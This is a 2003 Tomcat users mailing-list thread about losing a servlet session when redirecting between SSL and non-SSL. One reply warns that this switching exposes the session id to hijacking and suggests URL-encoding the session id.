Hello Andreas
> if you only want to protect the data that the
> user sends to the server...
I was getting users to log in using SSL, and then switching to non-SSL in
order to avoid the SSL overheads. (When I decided I could not 'hang on' to
the same session, I decided to stick with SSL permanently.)
> Have you tried to encode the sessionid in the request-url with
> response.encodeURL("TARGET-URL")?...
I shall have to dig up the code to double-check, and it may take me a while,
so please bear with me on that.
Regards
Harry Mantheakis
London, UK
> Hallo,
>
> others have commented on this, but first of all:
>
> From a security point of view it is a bad design if a session gets switched
> from SSL to non-SSL or vice-versa. The sessionid is always part of any
> request. So anyone observing a non-SSL-request can obtain the sessionid and
> thereby "hijack" a session that seems to be worth protecting. But if you
> only want to protect the data that the user sends to the server, it _might_
> be ok.
>
> But now to the point: How is the switching done? Have you tried to encode
> the sessionid in the request-url with response.encodeURL("TARGET-URL")? Does
> the problem remain?
>
> Greetings
>
> Andreas Mohrig
>
> -----Ursprungliche Nachricht-----
> Von: Harry Mantheakis [mailto:[EMAIL PROTECTED]
> Gesendet: Mittwoch, 12. November 2003 16:37
> An: Tomcat Users List
> Betreff: Re: Sessions - SSL
>
>
> Hello
>
>> No, not at all.
>
> I found that if I redirect a client from SSL to non-SSL I lose the session.
>
> Harry Mantheakis
> London, UK
>
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: [EMAIL PROTECTED]
> For additional commands, e-mail: [EMAIL PROTECTED]
>
---------------------------------------------------------------------
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
